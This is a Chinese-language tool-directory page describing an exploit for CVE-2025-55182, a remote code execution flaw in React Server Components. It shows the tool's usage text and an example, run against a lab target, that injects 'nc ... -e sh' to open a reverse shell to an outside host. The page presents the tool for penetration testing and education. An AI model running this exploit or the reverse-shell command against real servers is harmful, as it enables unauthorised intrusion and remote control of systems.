Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-React2Shell — CVE-2025-55182 漏洞利用 | 作者:infrar3d | Kitploit
工具/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell
Payload生成漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具
GitHubindustri4l-h3ll-xpl0it3rs/cve-2025-55182-react2shell

CVE-2025-55182-React2Shell

CVE-2025-55182 漏洞利用 | 作者:infrar3d

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
44个月前尚未审核

CVE-2025-55182-React2Shell

由 infrar3d 开发

一个影响 React.js 服务器端使用的 10.0 严重性漏洞,在 React.js 中被跟踪为 CVE-2025-55182,在 Next.js 框架中被跟踪为 CVE-2025-66478。

该漏洞由 Lachlan Davidson 于 2025 年 11 月 29 日太平洋时间负责任地向 Meta 团队披露。React 和 Vercel 于 2025 年 12 月 3 日太平洋时间进行了初步披露和补丁发布。(原文:https://react2shell.com/)

用法:

python3 CVE-2025-55182.py --help 
usage: python CVE-2025-55182.py -u <URL> [-c COMMAND]

CVE-2025-55182 - React Server Components RCE Exploit

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (required)
  -c, --command COMMAND
                        Command to execute on target (default: id)

Example: python CVE-2025-55182.py -u http://target.com -c "whoami"


示例(在 HTB 任务上测试):

python3 CVE-2025-55182.py -u http://154.57.164.73:30507 -c "nc 10.0.2.4 4444 -e sh"

⚠️ 免责声明 ⚠️

本软件和概念验证代码仅供教育和研究目的使用。

  • 作者对本程序造成的任何误用或损坏概不负责。
  • 未经明确事先许可,请勿针对任何系统使用。
  • 未经同意使用本工具攻击目标属于违法行为。

您有责任遵守所有适用法律。请遵守道德并负责任地使用。

下载工具